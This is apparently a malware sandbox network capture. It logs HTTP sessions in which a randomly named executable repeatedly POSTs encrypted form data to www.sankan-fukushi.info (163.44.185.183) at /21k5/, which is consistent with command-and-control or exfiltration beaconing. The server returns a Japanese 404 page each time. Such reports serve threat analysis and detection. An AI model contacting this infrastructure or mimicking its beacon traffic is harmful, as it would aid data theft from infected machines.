Jan 11, 2025 09:34:03.060942888 CET	834	OUT	POST /21k5/ HTTP/1.1 Host: www.sankan-fukushi.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.sankan-fukushi.info Referer: http://www.sankan-fukushi.info/21k5/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 77 50 67 70 42 65 7a 5a 47 62 68 43 77 59 4d 64 68 2b 58 77 4a 6b 4d 5a 67 39 6e 34 49 66 79 6f 35 39 37 43 4b 36 45 64 38 67 4e 6f 52 41 37 70 68 35 36 4f 4c 78 46 48 43 37 74 63 46 36 66 47 41 79 73 37 67 53 73 77 57 4f 76 41 49 41 34 37 6b 78 75 46 70 52 74 64 6a 75 65 30 57 74 61 52 53 6a 73 6f 36 55 65 53 57 4b 46 73 66 48 6a 59 59 6c 32 59 65 6f 6a 78 77 4e 49 54 56 30 37 50 4e 4f 72 63 39 4f 73 5a 79 59 6a 6d 45 4e 4c 72 77 79 63 33 30 38 74 52 4d 4b 62 78 6f 48 37 46 36 5a 46 52 42 64 44 30 48 6b 45 46 52 49 51 4b 48 52 66 51 6b 6b 42 74 70 4a 6f 54 55 51 4f 62 31 4b 56 6f 2f 51 3d 3d Data Ascii: 40G=SUzGnuvHqjrdwPgpBezZGbhCwYMdh+XwJkMZg9n4Ifyo597CK6Ed8gNoRA7ph56OLxFHC7tcF6fGAys7gSswWOvAIA47kxuFpRtdjue0WtaRSjso6UeSWKFsfHjYYl2YeojxwNITV07PNOrc9OsZyYjmENLrwyc308tRMKbxoH7F6ZFRBdD0HkEFRIQKHRfQkkBtpJoTUQOb1KVo/Q==
Jan 11, 2025 09:34:03.819210052 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:34:03 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Jan 11, 2025 09:34:03.819220066 CET	1236	IN	Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
Jan 11, 2025 09:34:03.819236994 CET	1236	IN	Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
Jan 11, 2025 09:34:03.819242001 CET	655	IN	Data Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
Jan 11, 2025 09:34:03.819250107 CET	1236	IN	Data Raw: 61 6c 2d 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 Data Ascii: al-right { margin-left: 0; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/javascript"> /
Jan 11, 2025 09:34:03.819287062 CET	1236	IN	Data Raw: 2e 31 2d 32 2e 38 34 35 20 33 33 2e 30 35 36 2d 38 2e 39 34 20 34 2e 39 35 36 2d 36 2e 30 39 35 20 33 2e 33 34 33 2d 31 34 2e 34 36 33 20 31 2e 37 31 36 2d 32 32 2e 34 35 35 7a 6d 2d 36 32 2e 32 37 31 2d 33 38 2e 33 33 34 63 35 2e 31 39 33 2d 36 Data Ascii: .1-2.845 33.056-8.94 4.956-6.095 3.343-14.463 1.716-22.455zm-62.271-38.334c5.193-6.923 14.381-10.43 27.3-10.43h.314c12.974 0 22.058 3.582 26.936 10.535 2.787 4.183 4.285 9.091 4.31 14.117-4.045-13.545-15.289-21.356-31.774-21.431-11.253 0-19.93
Jan 11, 2025 09:34:03.819300890 CET	424	IN	Data Raw: 32 35 37 2e 34 36 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 34 32 2e 38 33 32 20 38 39 2e 36 32 36 6c 39 2e 31 37 33 20 38 2e 38 20 39 2e 34 38 38 2d 38 2e 37 32 36 2d 32 2e 36 33 34 2d 32 31 2e 34 37 36 68 Data Ascii: 257.462z"/><path fill="#fff" d="M42.832 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16 43.646c-1.061-2.641-3.633-4.362-6.48-4.335-.793-.06-1.59.001-2.364.181-.533-2.534-1.341-5.002-2.409-7.36-.304-.67-.986-1.0
Jan 11, 2025 09:34:03.819340944 CET	1236	IN	Data Raw: 30 34 2d 2e 30 30 31 20 32 2e 36 35 38 2e 35 38 31 20 35 2e 32 38 33 20 31 2e 37 30 36 20 37 2e 36 39 31 20 31 2e 32 34 37 20 32 2e 32 39 36 20 33 2e 37 30 36 20 33 2e 36 36 38 20 36 2e 33 31 35 20 33 2e 35 32 32 68 2e 36 34 33 63 2e 39 37 39 2d Data Ascii: 04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668 6.315 3.522h.643c.979-.032 1.941-.261 2.829-.673 4.489 11.438 14.1 19.566 24.976 19.566h.209c10.834 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201
Jan 11, 2025 09:34:03.819349051 CET	1236	IN	Data Raw: 39 63 31 2e 34 37 34 2d 2e 31 32 36 20 32 2e 38 35 36 2e 37 33 31 20 33 2e 34 20 32 2e 31 30 37 2e 35 37 20 32 2e 30 32 35 2e 37 32 32 20 34 2e 31 34 35 2e 34 34 36 20 36 2e 32 33 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 Data Ascii: 9c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.231z"/><path fill="#fff" d="M39.765 24.186c-7.462 5.259-11.816 13.887-11.613 23.014 0 16.42 10.954 30.357 24.063 30.4h.15c13.079 0 24.183-13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.
Jan 11, 2025 09:34:03.819453001 CET	1236	IN	Data Raw: 33 35 31 2d 31 2e 34 31 36 20 32 2e 32 38 35 2d 31 2e 31 30 33 6c 33 2e 35 20 31 2e 32 37 39 20 33 2e 35 31 37 2d 31 2e 32 37 39 63 2e 36 31 33 2d 2e 32 35 31 20 31 2e 33 31 34 2d 2e 31 34 32 20 31 2e 38 32 32 2e 32 38 32 2e 35 31 2e 34 32 35 2e Data Ascii: 351-1.416 2.285-1.103l3.5 1.279 3.517-1.279c.613-.251 1.314-.142 1.822.282.51.425.746 1.095.616 1.746s-.607 1.178-1.241 1.374l-4.115 1.5c-.195.075-.403.116-.612.119z"/><path fill="#FFEBE9" d="M52.29 58.908l-2.319-2.92s2.394-4.259 2.394-7.254"/
Jan 11, 2025 09:34:03.824115038 CET	1236	IN	Data Raw: 35 2d 32 2e 35 31 31 20 33 2e 39 31 37 20 32 2e 36 30 38 20 31 30 2e 34 32 38 20 36 2e 39 38 34 63 2e 31 32 39 2e 30 38 36 2e 32 38 31 2e 31 33 33 2e 34 33 37 2e 31 33 33 6c 2e 32 34 38 2d 2e 30 33 34 63 2e 32 32 36 2d 2e 30 37 34 2e 34 30 37 2d Data Ascii: 5-2.511 3.917 2.608 10.428 6.984c.129.086.281.133.437.133l.248-.034c.226-.074.407-.245.493-.466l1.763-4.509 1.922.5c-.696 5.034-1.933 9.979-3.688 14.748-.952 2.538-2.094 5.001-3.417 7.367l-.4.681-.73 1.178c-.361.6-.739 1.153-1.093 1.657l-.208.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49970	163.44.185.183	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:34:05.610178947 CET	854	OUT	POST /21k5/ HTTP/1.1 Host: www.sankan-fukushi.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.sankan-fukushi.info Referer: http://www.sankan-fukushi.info/21k5/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 6d 6f 35 63 4c 43 4c 37 45 64 2f 67 4e 6f 61 67 37 73 72 5a 36 51 4c 78 4a 70 43 36 52 63 46 36 4c 47 41 33 51 37 68 68 55 2f 58 65 76 34 41 67 34 6c 71 52 75 46 70 52 74 64 6a 75 4b 4b 57 75 71 52 53 79 63 6f 36 31 65 52 63 71 46 76 50 33 6a 59 63 6c 32 63 65 6f 6a 48 77 4d 55 39 56 32 44 50 4e 4f 62 63 38 61 34 65 39 59 6a 67 5a 39 4c 31 35 77 49 79 77 4f 35 57 44 4c 50 66 6e 32 7a 55 2f 76 45 7a 62 2f 50 59 5a 31 38 2b 56 4b 30 38 51 33 43 6c 6d 6c 46 31 6b 72 63 79 4c 6e 72 78 34 59 30 73 70 76 2f 53 67 68 70 73 6f 70 44 4e 33 48 77 73 4e 58 56 46 61 6c 41 3d Data Ascii: 40G=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRItmo5cLCL7Ed/gNoag7srZ6QLxJpC6RcF6LGA3Q7hhU/Xev4Ag4lqRuFpRtdjuKKWuqRSyco61eRcqFvP3jYcl2ceojHwMU9V2DPNObc8a4e9YjgZ9L15wIywO5WDLPfn2zU/vEzb/PYZ18+VK08Q3ClmlF1krcyLnrx4Y0spv/SghpsopDN3HwsNXVFalA=
Jan 11, 2025 09:34:06.381274939 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:34:06 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Jan 11, 2025 09:34:06.381293058 CET	224	IN	Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center;
Jan 11, 2025 09:34:06.381305933 CET	1236	IN	Data Raw: 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 Data Ascii: -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap;
Jan 11, 2025 09:34:06.381318092 CET	1236	IN	Data Raw: 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 Data Ascii: : middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
Jan 11, 2025 09:34:06.381330967 CET	1236	IN	Data Raw: 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 Data Ascii: } .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media s
Jan 11, 2025 09:34:06.381345034 CET	643	IN	Data Raw: 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 Data Ascii: rg/2000/svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-3
Jan 11, 2025 09:34:06.381357908 CET	1236	IN	Data Raw: 35 36 2d 33 31 2e 37 37 34 2d 32 31 2e 34 33 31 2d 31 31 2e 32 35 33 20 30 2d 31 39 2e 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37 36 36 20 36 2e 38 33 39 2d 35 2e 39 38 36 20 31 30 Data Ascii: 56-31.774-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238 6.114.696 1.315 2
Jan 11, 2025 09:34:06.381371021 CET	1236	IN	Data Raw: 30 32 2d 32 2e 34 30 39 2d 37 2e 33 36 2d 2e 33 30 34 2d 2e 36 37 2d 2e 39 38 36 2d 31 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33 2e 35 36 37 2d 33 33 2e 37 31 35 2d 31 30 2e 33 32 35 2d Data Ascii: 02-2.409-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.658.581 5.283 1.706 7
Jan 11, 2025 09:34:06.381383896 CET	424	IN	Data Raw: 2d 32 36 2e 34 34 33 63 2d 2e 30 31 31 20 32 2e 30 39 38 2d 2e 34 34 39 20 34 2e 31 37 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39 35 36 2d 33 2e 36 33 36 20 31 2e 36 34 31 2d 2e 36 34 37 Data Ascii: -26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126 2.856.731 3.4 2.10
Jan 11, 2025 09:34:06.381396055 CET	1236	IN	Data Raw: 39 31 2e 30 31 33 2d 34 2e 33 38 37 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32 2d 31 30 2e 34 33 7a 22 2f 3e 3c 70 61 74 68 20 66 Data Ascii: 91.013-4.387-.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26
Jan 11, 2025 09:34:06.388554096 CET	1236	IN	Data Raw: 2d 32 2e 39 32 73 32 2e 33 39 34 2d 34 2e 32 35 39 20 32 2e 33 39 34 2d 37 2e 32 35 34 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 35 32 2e 33 36 35 20 36 30 2e 37 31 34 63 2d 2e 35 34 38 2e 30 30 31 2d 31 2e 30 36 Data Ascii: -2.92s2.394-4.259 2.394-7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49971	163.44.185.183	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:34:08.155951023 CET	1867	OUT	POST /21k5/ HTTP/1.1 Host: www.sankan-fukushi.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.sankan-fukushi.info Referer: http://www.sankan-fukushi.info/21k5/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 2b 6f 34 75 44 43 4a 59 73 64 77 41 4e 6f 5a 67 37 74 72 5a 37 56 4c 77 68 6c 43 36 63 2b 46 2b 37 47 41 56 49 37 70 77 55 2f 64 65 76 34 43 67 34 34 6b 78 75 55 70 53 56 5a 6a 75 61 4b 57 75 71 52 53 77 45 6f 34 6b 65 52 61 71 46 73 66 48 6a 4d 59 6c 32 34 65 6f 4c 58 77 4d 51 44 56 46 4c 50 4e 71 2f 63 77 4a 41 65 30 59 6a 69 59 39 4b 6d 35 77 56 69 77 4f 6c 73 44 4b 4c 31 6e 31 54 55 2f 75 78 4e 42 37 37 48 47 32 6f 39 61 71 6f 68 52 55 43 71 6d 55 77 49 72 6f 6b 51 46 45 2f 56 77 71 49 2f 6e 61 4b 76 67 7a 52 46 74 61 48 46 34 43 4a 67 53 6c 78 38 4d 78 73 71 54 74 65 4a 41 6c 35 46 6d 65 78 54 67 41 55 66 78 36 4b 65 44 6e 5a 70 66 4f 6c 66 37 49 54 41 35 61 52 4d 55 33 50 39 75 31 50 38 79 68 43 2b 67 76 67 78 55 76 53 56 48 4a 39 31 30 42 7a 36 48 37 35 4f 46 76 52 57 46 59 37 6c 58 65 65 6e 62 70 59 64 63 57 48 5a 6f 42 62 44 48 37 6d 49 76 4c 39 73 65 54 [TRUNCATED] Data Ascii: 40G=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRIt+o4uDCJYsdwANoZg7trZ7VLwhlC6c+F+7GAVI7pwU/dev4Cg44kxuUpSVZjuaKWuqRSwEo4keRaqFsfHjMYl24eoLXwMQDVFLPNq/cwJAe0YjiY9Km5wViwOlsDKL1n1TU/uxNB77HG2o9aqohRUCqmUwIrokQFE/VwqI/naKvgzRFtaHF4CJgSlx8MxsqTteJAl5FmexTgAUfx6KeDnZpfOlf7ITA5aRMU3P9u1P8yhC+gvgxUvSVHJ910Bz6H75OFvRWFY7lXeenbpYdcWHZoBbDH7mIvL9seTnsMcIL0FSmnAjx3Gco9ZIDm+YaYgRVgIeycPyqRgpaSiD7YwcPVuBdiyPGlA4Otx5vkK7+7lm0eG2h+N3Ori/DxeYGDzb6qTloQNwfntxlL47rEhv62VmDnDiEK0+jLW37el0c1o874e/H7NxTIdLCMoKxws/+GyZpvcN/aHN7o504mDKKeOXscKIKyuXIP2hn8SzBYL4zajbjgJoHFS5e/PQHfuMr0KLjAnWL63AxuAidupib/+HuBRYO7Nx8NsZweY7MiIF1Hh5cah5Vg31zyPosCpkWkfnTrIjZKWhnLrgLMY41FPjGdqtclDOkbDiBrwtMfuOoTafjL2q9HHPotP6w9kFz02jJU9tDH5edEEoqkE+TarOzGWpsT3SU+LneX8TqZbTIDL18T3+QXhLOUl+SNUPziiQOWvxjwiu+0I0MJxEYnupeO6VzQhlmwhqyH8deXux8FdUj5zvAwfkRyajiKnRwTpYST/RnLnT+V1pL1qvh7wb1DTi6ESoxsz53OCbZpLuW+QXilPgiwVK0+f8UuvoM+K4ikS8Lp8jJKjVAKqTjtI+L//yzi8hs6/bZJSA3GgkrwSrkeBUid5poenoj/oXAE4d4l9cK11CTsgEi/eoBybOeM7QjmzZvbFX/1v+r0HE4M6/GmT0/mP5WoQZPcY14bG84 [TRUNCATED]
Jan 11, 2025 09:34:08.925858021 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:34:08 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 